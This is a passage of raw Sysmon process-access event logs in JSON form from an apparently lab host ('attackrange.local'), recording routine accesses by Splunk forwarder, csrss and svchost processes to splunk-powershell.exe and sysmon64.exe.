0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}","TargetProcessId":"3052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7143,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EE-5F25-0000-0010AB6E0A00}","TargetProcessId":"3052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7144,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:58.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:58.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 